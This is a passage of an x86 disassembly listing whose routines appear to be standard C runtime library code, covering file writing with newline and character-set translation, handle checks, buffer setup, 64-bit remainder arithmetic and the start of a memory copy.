		mov	[ebp+518h+var_580], esi
		jnz	short loc_40D456
		xor	eax, eax
		jmp	loc_40D9CA
; ---------------------------------------------------------------------------

loc_40D456:				; CODE XREF: sub_40D41A+33j
		cmp	eax, esi
		jnz	short loc_40D481
		call	sub_405DA6
		mov	[eax], esi
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_40D9CA
; ---------------------------------------------------------------------------

loc_40D481:				; CODE XREF: sub_40D41A+3Ej
		mov	esi, [ebp+518h+arg_0]
		push	ebx
		mov	ebx, esi
		and	ebx, 1Fh
		imul	ebx, 28h
		mov	eax, esi
		sar	eax, 5
		push	edi
		lea	edi, ds:437700h[eax*4]
		mov	eax, [edi]
		add	eax, ebx
		mov	cl, [eax+24h]
		add	cl, cl
		sar	cl, 1
		cmp	cl, 2
		mov	[ebp+518h+var_588], edi
		mov	[ebp+518h+var_56D], cl
		jz	short loc_40D4B8
		cmp	cl, 1
		jnz	short loc_40D4EB

loc_40D4B8:				; CODE XREF: sub_40D41A+97j
		mov	ecx, [ebp+518h+arg_8]
		not	ecx
		test	cl, 1
		jnz	short loc_40D4EB
		call	sub_405DA6
		xor	esi, esi
		mov	[eax], esi
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		jmp	loc_40D9C0
; ---------------------------------------------------------------------------

loc_40D4EB:				; CODE XREF: sub_40D41A+9Cj
					; sub_40D41A+A9j
		test	byte ptr [eax+4], 20h
		jz	short loc_40D500
		push	2
		push	0
		push	0
		push	esi
		call	sub_40D27E
		add	esp, 10h

loc_40D500:				; CODE XREF: sub_40D41A+D5j
		push	esi
		call	sub_40DB00
		test	eax, eax
		pop	ecx
		jz	loc_40D705
		mov	eax, [edi]
		test	byte ptr [ebx+eax+4], 80h
		jz	loc_40D705
		call	sub_40595D
		mov	eax, [eax+6Ch]
		xor	ecx, ecx
		cmp	[eax+14h], ecx
		lea	eax, [ebp+518h+var_594]
		setz	cl
		push	eax
		mov	eax, [edi]
		push	dword ptr [ebx+eax]
		mov	esi, ecx
		call	ds:off_41E114
		test	eax, eax
		jz	loc_40D705
		test	esi, esi
		jz	short loc_40D553
		cmp	[ebp+518h+var_56D], 0
		jz	loc_40D705

loc_40D553:				; CODE XREF: sub_40D41A+12Dj
		call	ds:off_41E118
		and	[ebp+518h+var_568], 0
		cmp	[ebp+518h+arg_8], 0
		mov	esi, [ebp+518h+var_57C]
		mov	[ebp+518h+var_594], eax
		mov	[ebp+518h+var_58C], esi
		jbe	loc_40D972
		and	[ebp+518h+var_574], 0
		jmp	short loc_40D57C
; ---------------------------------------------------------------------------

loc_40D579:				; CODE XREF: sub_40D41A+2E0j
		mov	esi, [ebp+518h+var_58C]

loc_40D57C:				; CODE XREF: sub_40D41A+15Dj
		mov	al, [ebp+518h+var_56D]
		test	al, al
		jnz	loc_40D68D
		mov	al, [esi]
		xor	ecx, ecx
		cmp	al, 0Ah
		setz	cl
		movsx	eax, al
		push	eax
		mov	[ebp+518h+var_590], ecx
		call	sub_40CFF6
		test	eax, eax
		pop	ecx
		jnz	short loc_40D5BB
		push	1
		lea	eax, [ebp+518h+var_56C]
		push	esi
		push	eax
		call	sub_40FA90
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40D968
		jmp	short loc_40D5EB
; ---------------------------------------------------------------------------

loc_40D5BB:				; CODE XREF: sub_40D41A+185j
		mov	eax, [ebp+518h+var_57C]
		sub	eax, esi
		add	eax, [ebp+518h+arg_8]
		cmp	eax, 1
		jbe	loc_40D968
		push	2
		lea	eax, [ebp+518h+var_56C]
		push	esi
		push	eax
		call	sub_40FA90
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40D968
		inc	esi
		inc	[ebp+518h+var_574]

loc_40D5EB:				; CODE XREF: sub_40D41A+19Fj
		xor	eax, eax
		push	eax
		push	eax
		push	5
		lea	ecx, [ebp+518h+var_C]
		push	ecx
		push	1
		lea	ecx, [ebp+518h+var_56C]
		push	ecx
		push	eax
		push	[ebp+518h+var_594]
		inc	esi
		inc	[ebp+518h+var_574]
		mov	[ebp+518h+var_58C], esi
		call	ds:dword_41E134	; WideCharToMultiByte
		mov	esi, eax
		test	esi, esi
		jz	loc_40D968
		push	0
		lea	eax, [ebp+518h+var_568]
		push	eax
		push	esi
		lea	eax, [ebp+518h+var_C]
		push	eax
		mov	eax, [edi]
		push	dword ptr [ebx+eax]
		call	ds:off_41E088
		test	eax, eax
		jz	loc_40D95F
		mov	eax, [ebp+518h+var_568]
		add	[ebp+518h+var_578], eax
		cmp	eax, esi
		jl	loc_40D968
		cmp	[ebp+518h+var_590], 0
		jz	loc_40D6F1
		push	0
		lea	eax, [ebp+518h+var_568]
		push	eax
		push	1
		lea	eax, [ebp+518h+var_C]
		push	eax
		mov	eax, [edi]
		mov	[ebp+518h+var_C], 0Dh
		push	dword ptr [ebx+eax]
		call	ds:off_41E088
		test	eax, eax
		jz	loc_40D95F
		cmp	[ebp+518h+var_568], 1
		jl	loc_40D968
		inc	[ebp+518h+var_580]
		inc	[ebp+518h+var_578]
		jmp	short loc_40D6F1
; ---------------------------------------------------------------------------

loc_40D68D:				; CODE XREF: sub_40D41A+167j
		cmp	al, 1
		jz	short loc_40D695
		cmp	al, 2
		jnz	short loc_40D6B0

loc_40D695:				; CODE XREF: sub_40D41A+275j
		movzx	ecx, word ptr [esi]
		xor	edx, edx
		cmp	cx, 0Ah
		setz	dl
		inc	esi
		inc	esi
		add	[ebp+518h+var_574], 2
		mov	[ebp+518h+var_56C], ecx
		mov	[ebp+518h+var_58C], esi
		mov	[ebp+518h+var_590], edx

loc_40D6B0:				; CODE XREF: sub_40D41A+279j
		cmp	al, 1
		jz	short loc_40D6B8
		cmp	al, 2
		jnz	short loc_40D6F1

loc_40D6B8:				; CODE XREF: sub_40D41A+298j
		push	[ebp+518h+var_56C]
		call	sub_410A9C
		cmp	ax, word ptr [ebp+518h+var_56C]
		pop	ecx
		jnz	loc_40D95F
		inc	[ebp+518h+var_578]
		cmp	[ebp+518h+var_590], 0
		jz	short loc_40D6F1
		push	0Dh
		pop	eax
		push	eax
		mov	[ebp+518h+var_56C], eax
		call	sub_410A9C
		cmp	ax, word ptr [ebp+518h+var_56C]
		pop	ecx
		jnz	loc_40D95F
		inc	[ebp+518h+var_578]
		inc	[ebp+518h+var_580]

loc_40D6F1:				; CODE XREF: sub_40D41A+232j
					; sub_40D41A+271j ...
		mov	eax, [ebp+518h+arg_8]
		cmp	[ebp+518h+var_574], eax
		jb	loc_40D579
		jmp	loc_40D968
; ---------------------------------------------------------------------------

loc_40D705:				; CODE XREF: sub_40D41A+EFj
					; sub_40D41A+FCj ...
		mov	eax, [edi]
		add	eax, ebx
		test	byte ptr [eax+4], 80h
		jz	loc_40D938
		mov	eax, [ebp+518h+var_57C]
		xor	esi, esi
		cmp	[ebp+518h+var_56D], 0
		mov	[ebp+518h+var_56C], esi
		jnz	loc_40D7B6
		cmp	[ebp+518h+arg_8], esi
		mov	[ebp+518h+var_568], eax
		jbe	loc_40D999

loc_40D734:				; CODE XREF: sub_40D41A+395j
		mov	ecx, [ebp+518h+var_568]
		and	[ebp+518h+var_574], 0
		sub	ecx, [ebp+518h+var_57C]
		lea	eax, [ebp+518h+var_564]

loc_40D741:				; CODE XREF: sub_40D41A+354j
		cmp	ecx, [ebp+518h+arg_8]
		jnb	short loc_40D770
		mov	edx, [ebp+518h+var_568]
		inc	[ebp+518h+var_568]
		mov	dl, [edx]
		inc	ecx
		cmp	dl, 0Ah
		jnz	short loc_40D761
		inc	[ebp+518h+var_580]
		mov	byte ptr [eax],	0Dh
		inc	eax
		inc	[ebp+518h+var_574]

loc_40D761:				; CODE XREF: sub_40D41A+33Bj
		mov	[eax], dl
		inc	eax
		inc	[ebp+518h+var_574]
		cmp	[ebp+518h+var_574], 400h
		jb	short loc_40D741

loc_40D770:				; CODE XREF: sub_40D41A+32Dj
		mov	esi, eax
		lea	eax, [ebp+518h+var_564]
		sub	esi, eax
		push	0
		lea	eax, [ebp+518h+var_584]
		push	eax
		push	esi
		lea	eax, [ebp+518h+var_564]
		push	eax
		mov	eax, [edi]
		push	dword ptr [ebx+eax]
		call	ds:off_41E088
		test	eax, eax
		jz	loc_40D95F
		mov	eax, [ebp+518h+var_584]
		add	[ebp+518h+var_578], eax
		cmp	eax, esi
		jl	loc_40D968
		mov	eax, [ebp+518h+var_568]
		sub	eax, [ebp+518h+var_57C]
		cmp	eax, [ebp+518h+arg_8]
		jb	short loc_40D734
		jmp	loc_40D968
; ---------------------------------------------------------------------------

loc_40D7B6:				; CODE XREF: sub_40D41A+305j
		cmp	[ebp+518h+var_56D], 2
		jnz	loc_40D85D
		cmp	[ebp+518h+arg_8], esi
		mov	[ebp+518h+var_568], eax
		jbe	loc_40D999

loc_40D7CF:				; CODE XREF: sub_40D41A+438j
		mov	ecx, [ebp+518h+var_568]
		xor	esi, esi
		sub	ecx, [ebp+518h+var_57C]
		lea	eax, [ebp+518h+var_564]

loc_40D7DA:				; CODE XREF: sub_40D41A+3F7j
		cmp	ecx, [ebp+518h+arg_8]
		jnb	short loc_40D813
		mov	edx, [ebp+518h+var_568]
		add	[ebp+518h+var_568], 2
		movzx	edx, word ptr [edx]
		inc	ecx
		inc	ecx
		cmp	dx, 0Ah
		jnz	short loc_40D801
		add	[ebp+518h+var_580], 2
		mov	word ptr [eax],	0Dh
		inc	eax
		inc	eax
		inc	esi
		inc	esi

loc_40D801:				; CODE XREF: sub_40D41A+3D8j
		mov	edi, [ebp+518h+var_588]
		mov	[eax], dx
		inc	eax
		inc	eax
		inc	esi
		inc	esi
		cmp	esi, 3FFh
		jb	short loc_40D7DA

loc_40D813:				; CODE XREF: sub_40D41A+3C6j
		mov	esi, eax
		lea	eax, [ebp+518h+var_564]
		sub	esi, eax
		push	0
		lea	eax, [ebp+518h+var_584]
		push	eax
		push	esi
		lea	eax, [ebp+518h+var_564]
		push	eax
		mov	eax, [edi]
		push	dword ptr [ebx+eax]
		call	ds:off_41E088
		test	eax, eax
		jz	loc_40D95F
		mov	eax, [ebp+518h+var_584]
		add	[ebp+518h+var_578], eax
		cmp	eax, esi
		jl	loc_40D968
		mov	eax, [ebp+518h+var_568]
		sub	eax, [ebp+518h+var_57C]
		cmp	eax, [ebp+518h+arg_8]
		jb	loc_40D7CF
		jmp	loc_40D968
; ---------------------------------------------------------------------------

loc_40D85D:				; CODE XREF: sub_40D41A+3A0j
		cmp	[ebp+518h+arg_8], esi
		mov	[ebp+518h+var_574], eax
		jbe	loc_40D999

loc_40D86C:				; CODE XREF: sub_40D41A+516j
		mov	ecx, [ebp+518h+var_574]
		and	[ebp+518h+var_568], 0
		sub	ecx, [ebp+518h+var_57C]
		push	2
		lea	eax, [ebp+518h+var_160]
		pop	esi

loc_40D87F:				; CODE XREF: sub_40D41A+497j
		cmp	ecx, [ebp+518h+arg_8]
		jnb	short loc_40D8B3
		mov	edx, [ebp+518h+var_574]
		movzx	edx, word ptr [edx]
		add	[ebp+518h+var_574], esi
		add	ecx, esi
		cmp	dx, 0Ah
		jnz	short loc_40D8A2
		mov	word ptr [eax],	0Dh
		add	eax, esi
		add	[ebp+518h+var_568], esi

loc_40D8A2:				; CODE XREF: sub_40D41A+47Cj
		add	[ebp+518h+var_568], esi
		mov	[eax], dx
		add	eax, esi
		cmp	[ebp+518h+var_568], 152h
		jb	short loc_40D87F

loc_40D8B3:				; CODE XREF: sub_40D41A+46Bj
		xor	esi, esi
		push	esi
		push	esi
		push	2ABh
		lea	ecx, [ebp+518h+var_410]
		push	ecx
		lea	ecx, [ebp+518h+var_160]
		sub	eax, ecx
		cdq
		sub	eax, edx
		sar	eax, 1
		push	eax
		mov	eax, ecx
		push	eax
		push	esi
		push	0FDE9h
		call	ds:dword_41E134	; WideCharToMultiByte
		mov	edi, eax
		cmp	edi, esi
		jz	short loc_40D95F

loc_40D8E6:				; CODE XREF: sub_40D41A+4F6j
		push	0
		lea	eax, [ebp+518h+var_584]
		push	eax
		mov	eax, edi
		sub	eax, esi
		push	eax
		lea	eax, [ebp+esi+518h+var_410]
		push	eax
		mov	eax, [ebp+518h+var_588]
		mov	eax, [eax]
		push	dword ptr [ebx+eax]
		call	ds:off_41E088
		test	eax, eax
		jz	short loc_40D914
		add	esi, [ebp+518h+var_584]
		cmp	edi, esi
		jg	short loc_40D8E6
		jmp	short loc_40D91D
; ---------------------------------------------------------------------------

loc_40D914:				; CODE XREF: sub_40D41A+4EFj
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		mov	[ebp+518h+var_56C], eax

loc_40D91D:				; CODE XREF: sub_40D41A+4F8j
		cmp	edi, esi
		jg	short loc_40D968
		mov	eax, [ebp+518h+var_574]
		sub	eax, [ebp+518h+var_57C]
		cmp	eax, [ebp+518h+arg_8]
		mov	[ebp+518h+var_578], eax
		jb	loc_40D86C
		jmp	short loc_40D968
; ---------------------------------------------------------------------------

loc_40D938:				; CODE XREF: sub_40D41A+2F3j
		push	0
		lea	ecx, [ebp+518h+var_584]
		push	ecx
		push	[ebp+518h+arg_8]
		push	[ebp+518h+var_57C]
		push	dword ptr [eax]
		call	ds:off_41E088
		test	eax, eax
		jz	short loc_40D95F
		mov	eax, [ebp+518h+var_584]
		and	[ebp+518h+var_56C], 0
		mov	[ebp+518h+var_578], eax
		jmp	short loc_40D968
; ---------------------------------------------------------------------------

loc_40D95F:				; CODE XREF: sub_40D41A+21Aj
					; sub_40D41A+25Bj ...
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		mov	[ebp+518h+var_56C], eax

loc_40D968:				; CODE XREF: sub_40D41A+199j
					; sub_40D41A+1AFj ...
		mov	eax, [ebp+518h+var_578]
		test	eax, eax
		jnz	short loc_40D9C5
		mov	edi, [ebp+518h+var_588]

loc_40D972:				; CODE XREF: sub_40D41A+153j
		xor	esi, esi
		cmp	[ebp+518h+var_56C], esi
		jz	short loc_40D999
		push	5
		pop	esi
		cmp	[ebp+518h+var_56C], esi
		jnz	short loc_40D98E
		call	sub_405D93
		mov	dword ptr [eax], 9
		jmp	short loc_40D9B9
; ---------------------------------------------------------------------------

loc_40D98E:				; CODE XREF: sub_40D41A+565j
		push	[ebp+518h+var_56C]
		call	sub_405DB9
		pop	ecx
		jmp	short loc_40D9C0
; ---------------------------------------------------------------------------

loc_40D999:				; CODE XREF: sub_40D41A+314j
					; sub_40D41A+3AFj ...
		mov	eax, [edi]
		test	byte ptr [ebx+eax+4], 40h
		jz	short loc_40D9AE
		mov	eax, [ebp+518h+var_57C]
		cmp	byte ptr [eax],	1Ah
		jnz	short loc_40D9AE
		xor	eax, eax
		jmp	short loc_40D9C8
; ---------------------------------------------------------------------------

loc_40D9AE:				; CODE XREF: sub_40D41A+586j
					; sub_40D41A+58Ej
		call	sub_405D93
		mov	dword ptr [eax], 1Ch

loc_40D9B9:				; CODE XREF: sub_40D41A+572j
		call	sub_405DA6
		mov	[eax], esi

loc_40D9C0:				; CODE XREF: sub_40D41A+CCj
					; sub_40D41A+57Dj
		or	eax, 0FFFFFFFFh
		jmp	short loc_40D9C8
; ---------------------------------------------------------------------------

loc_40D9C5:				; CODE XREF: sub_40D41A+553j
		sub	eax, [ebp+518h+var_580]

loc_40D9C8:				; CODE XREF: sub_40D41A+592j
					; sub_40D41A+5A9j
		pop	edi
		pop	ebx

loc_40D9CA:				; CODE XREF: sub_40D41A+37j
					; sub_40D41A+62j
		mov	ecx, [ebp+518h+var_4]
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		add	ebp, 518h
		leave
		retn
sub_40D41A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D9E0	proc near		; CODE XREF: sub_406D96+CBp
					; sub_406D96+13Ap ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	10h
		push	offset dword_422D30
		call	__SEH_prolog4
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40DA0F
		call	sub_405DA6
		and	dword ptr [eax], 0
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_40DA07:				; CODE XREF: sub_40D9E0+5Cj
		or	eax, 0FFFFFFFFh
		jmp	loc_40DAAC
; ---------------------------------------------------------------------------

loc_40DA0F:				; CODE XREF: sub_40D9E0+12j
		xor	edi, edi
		cmp	eax, edi
		jl	short loc_40DA1D
		cmp	eax, dword_4376E4
		jb	short loc_40DA3E

loc_40DA1D:				; CODE XREF: sub_40D9E0+33j
					; sub_40D9E0+7Cj
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_40DA07
; ---------------------------------------------------------------------------

loc_40DA3E:				; CODE XREF: sub_40D9E0+3Bj
		mov	ecx, eax
		sar	ecx, 5
		lea	ebx, ds:437700h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [ebx]
		movzx	ecx, byte ptr [ecx+esi+4]
		and	ecx, 1
		jz	short loc_40DA1D
		push	eax
		call	sub_40F3AE
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		mov	eax, [ebx]
		test	byte ptr [eax+esi+4], 1
		jz	short loc_40DA87
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40D41A
		add	esp, 0Ch
		mov	[ebp+var_1C], eax
		jmp	short loc_40DA9D
; ---------------------------------------------------------------------------

loc_40DA87:				; CODE XREF: sub_40D9E0+8Fj
		call	sub_405D93
		mov	dword ptr [eax], 9
		call	sub_405DA6
		mov	[eax], edi
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40DA9D:				; CODE XREF: sub_40D9E0+A5j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40DAB2
		mov	eax, [ebp+var_1C]

loc_40DAAC:				; CODE XREF: sub_40D9E0+2Aj
		call	__SEH_epilog4
		retn
sub_40D9E0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DAB2	proc near		; CODE XREF: sub_40D9E0+C4p
					; DATA XREF: jlrllt49:00422D48o
		push	dword ptr [ebp+8]
		call	sub_40F44E
		pop	ecx
		retn
sub_40DAB2	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DABC	proc near		; CODE XREF: sub_406D96+9Cp
					; sub_40A24D+58p ...

arg_0		= dword	ptr  4

		inc	dword_428328
		push	1000h
		call	sub_407CFA
		test	eax, eax
		pop	ecx
		mov	ecx, [esp+arg_0]
		mov	[ecx+8], eax
		jz	short loc_40DAE5
		or	dword ptr [ecx+0Ch], 8
		mov	dword ptr [ecx+18h], 1000h
		jmp	short loc_40DAF6
; ---------------------------------------------------------------------------

loc_40DAE5:				; CODE XREF: sub_40DABC+1Aj
		or	dword ptr [ecx+0Ch], 4
		lea	eax, [ecx+14h]
		mov	[ecx+8], eax
		mov	dword ptr [ecx+18h], 2

loc_40DAF6:				; CODE XREF: sub_40DABC+27j
		mov	eax, [ecx+8]
		and	dword ptr [ecx+4], 0
		mov	[ecx], eax
		retn
sub_40DABC	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DB00	proc near		; CODE XREF: sub_406D96+91p
					; sub_408CDB+Cp ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40DB17
		call	sub_405D93
		mov	dword ptr [eax], 9
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_40DB17:				; CODE XREF: sub_40DB00+7j
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jl	short loc_40DB26
		cmp	eax, dword_4376E4
		jb	short loc_40DB42

loc_40DB26:				; CODE XREF: sub_40DB00+1Cj
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 9
		call	sub_4034C7
		add	esp, 14h
		xor	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40DB42:				; CODE XREF: sub_40DB00+24j
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_437700[ecx*4]
		movzx	eax, byte ptr [ecx+eax+4]
		and	eax, 40h
		pop	esi
		retn
sub_40DB00	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DB5E	proc near		; CODE XREF: sub_407F39:loc_407F5Cp
		push	esi
		push	edi
		xor	edi, edi

loc_40DB62:				; CODE XREF: sub_40DB5E+1Aj
		lea	esi, off_424F80[edi]
		push	dword ptr [esi]
		call	sub_4056E7
		add	edi, 4
		cmp	edi, 28h
		pop	ecx
		mov	[esi], eax
		jb	short loc_40DB62
		pop	edi
		pop	esi
		retn
sub_40DB5E	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DB7D	proc near		; CODE XREF: sub_406F97+554p
		mov	eax, dword_424064
		or	eax, 1
		xor	ecx, ecx
		cmp	dword_428780, eax
		setz	cl
		mov	eax, ecx
		retn
sub_40DB7D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40DB93	proc near		; CODE XREF: sub_40DCF2+12p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= word ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		mov	esi, [ebp+arg_4]
		xor	ebx, ebx
		cmp	esi, ebx
		push	edi
		mov	edi, [ebp+arg_8]
		jnz	short loc_40DBB9
		cmp	edi, ebx
		jbe	short loc_40DBB9
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40DBB5
		mov	[eax], ebx

loc_40DBB5:				; CODE XREF: sub_40DB93+1Ej
					; sub_40DB93+ECj ...
		xor	eax, eax
		jmp	short loc_40DC38
; ---------------------------------------------------------------------------

loc_40DBB9:				; CODE XREF: sub_40DB93+13j
					; sub_40DB93+17j
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40DBC3
		or	dword ptr [eax], 0FFFFFFFFh

loc_40DBC3:				; CODE XREF: sub_40DB93+2Bj
		cmp	edi, 7FFFFFFFh
		jbe	short loc_40DBE6
		call	sub_405D93
		push	16h
		pop	esi
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4034C7
		add	esp, 14h

loc_40DBE2:				; CODE XREF: sub_40DB93+CCj
					; sub_40DB93+D5j
		mov	eax, esi
		jmp	short loc_40DC38
; ---------------------------------------------------------------------------

loc_40DBE6:				; CODE XREF: sub_40DB93+36j
		push	[ebp+arg_10]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	eax, [ebp+var_10]
		cmp	[eax+14h], ebx
		jnz	loc_40DC91
		mov	ax, [ebp+arg_C]
		cmp	ax, 0FFh
		jbe	short loc_40DC3D
		cmp	esi, ebx
		jz	short loc_40DC1A
		cmp	edi, ebx
		jbe	short loc_40DC1A
		push	edi
		push	ebx
		push	esi
		call	sub_408130
		add	esp, 0Ch

loc_40DC1A:				; CODE XREF: sub_40DB93+76j
					; sub_40DB93+7Aj ...
		call	sub_405D93
		mov	dword ptr [eax], 2Ah
		call	sub_405D93
		cmp	[ebp+var_4], bl
		mov	eax, [eax]
		jz	short loc_40DC38
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

loc_40DC38:				; CODE XREF: sub_40DB93+24j
					; sub_40DB93+51j ...
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_40DC3D:				; CODE XREF: sub_40DB93+72j
		cmp	esi, ebx
		jz	short loc_40DC6F
		cmp	edi, ebx
		ja	short loc_40DC6D

loc_40DC45:				; CODE XREF: sub_40DB93+141j
					; sub_40DB93+149j ...
		call	sub_405D93
		push	22h
		pop	esi
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_40DBE2
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh
		jmp	loc_40DBE2
; ---------------------------------------------------------------------------

loc_40DC6D:				; CODE XREF: sub_40DB93+B0j
		mov	[esi], al

loc_40DC6F:				; CODE XREF: sub_40DB93+ACj
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40DC7C
		mov	dword ptr [eax], 1

loc_40DC7C:				; CODE XREF: sub_40DB93+E1j
					; sub_40DB93+12Aj ...
		cmp	[ebp+var_4], bl
		jz	loc_40DBB5
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh
		jmp	loc_40DBB5
; ---------------------------------------------------------------------------

loc_40DC91:				; CODE XREF: sub_40DB93+64j
		lea	ecx, [ebp+arg_4]
		push	ecx
		push	ebx
		push	edi
		push	esi
		push	1
		lea	ecx, [ebp+arg_C]
		push	ecx
		push	ebx
		mov	[ebp+arg_4], ebx
		push	dword ptr [eax+4]
		call	ds:dword_41E134	; WideCharToMultiByte
		cmp	eax, ebx
		jz	short loc_40DCC3
		cmp	[ebp+arg_4], ebx
		jnz	loc_40DC1A
		mov	ecx, [ebp+arg_0]
		cmp	ecx, ebx
		jz	short loc_40DC7C
		mov	[ecx], eax
		jmp	short loc_40DC7C
; ---------------------------------------------------------------------------

loc_40DCC3:				; CODE XREF: sub_40DB93+11Aj
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 7Ah
		jnz	loc_40DC1A
		cmp	esi, ebx
		jz	loc_40DC45
		cmp	edi, ebx
		jbe	loc_40DC45
		push	edi
		push	ebx
		push	esi
		call	sub_408130
		add	esp, 0Ch
		jmp	loc_40DC45
sub_40DB93	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DCF2	proc near		; CODE XREF: sub_406F97+487p
					; sub_406F97+8B1p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	0
		push	[esp+4+arg_C]
		push	[esp+8+arg_8]
		push	[esp+0Ch+arg_4]
		push	[esp+10h+arg_0]
		call	sub_40DB93
		add	esp, 14h
		retn
sub_40DCF2	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_40DD10	proc near		; CODE XREF: sub_406F97+786p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	esi
		mov	eax, [esp+4+arg_C]
		or	eax, eax
		jnz	short loc_40DD41
		mov	ecx, [esp+4+arg_8]
		mov	eax, [esp+4+arg_4]
		xor	edx, edx
		div	ecx
		mov	ebx, eax
		mov	eax, [esp+4+arg_0]
		div	ecx
		mov	esi, eax
		mov	eax, ebx
		mul	[esp+4+arg_8]
		mov	ecx, eax
		mov	eax, esi
		mul	[esp+4+arg_8]
		add	edx, ecx
		jmp	short loc_40DD88
; ---------------------------------------------------------------------------

loc_40DD41:				; CODE XREF: sub_40DD10+7j
		mov	ecx, eax
		mov	ebx, [esp+4+arg_8]
		mov	edx, [esp+4+arg_4]
		mov	eax, [esp+4+arg_0]

loc_40DD4F:				; CODE XREF: sub_40DD10+49j
		shr	ecx, 1
		rcr	ebx, 1
		shr	edx, 1
		rcr	eax, 1
		or	ecx, ecx
		jnz	short loc_40DD4F
		div	ebx
		mov	esi, eax
		mul	[esp+4+arg_C]
		mov	ecx, eax
		mov	eax, [esp+4+arg_8]
		mul	esi
		add	edx, ecx
		jb	short loc_40DD7D
		cmp	edx, [esp+4+arg_4]
		ja	short loc_40DD7D
		jb	short loc_40DD86
		cmp	eax, [esp+4+arg_0]
		jbe	short loc_40DD86

loc_40DD7D:				; CODE XREF: sub_40DD10+5Dj
					; sub_40DD10+63j
		dec	esi
		sub	eax, [esp+4+arg_8]
		sbb	edx, [esp+4+arg_C]

loc_40DD86:				; CODE XREF: sub_40DD10+65j
					; sub_40DD10+6Bj
		xor	ebx, ebx

loc_40DD88:				; CODE XREF: sub_40DD10+2Fj
		sub	eax, [esp+4+arg_0]
		sbb	edx, [esp+4+arg_4]
		neg	edx
		neg	eax
		sbb	edx, 0
		mov	ecx, edx
		mov	edx, ebx
		mov	ebx, ecx
		mov	ecx, eax
		mov	eax, esi
		pop	esi
		retn	10h
sub_40DD10	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40DDA5	proc near		; CODE XREF: sub_40DE2C+4Dp

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 8
		mov	[ebp+var_4], edi
		mov	[ebp+var_8], esi
		mov	esi, [ebp+arg_4]
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+arg_8]
		shr	ecx, 7
		jmp	short loc_40DDC5
; ---------------------------------------------------------------------------
		db 8Dh,	9Bh, 4 dup(0)
; ---------------------------------------------------------------------------

loc_40DDC5:				; CODE XREF: sub_40DDA5+18j
					; sub_40DDA5+7Bj
		movdqa	xmm0, oword ptr	[esi]
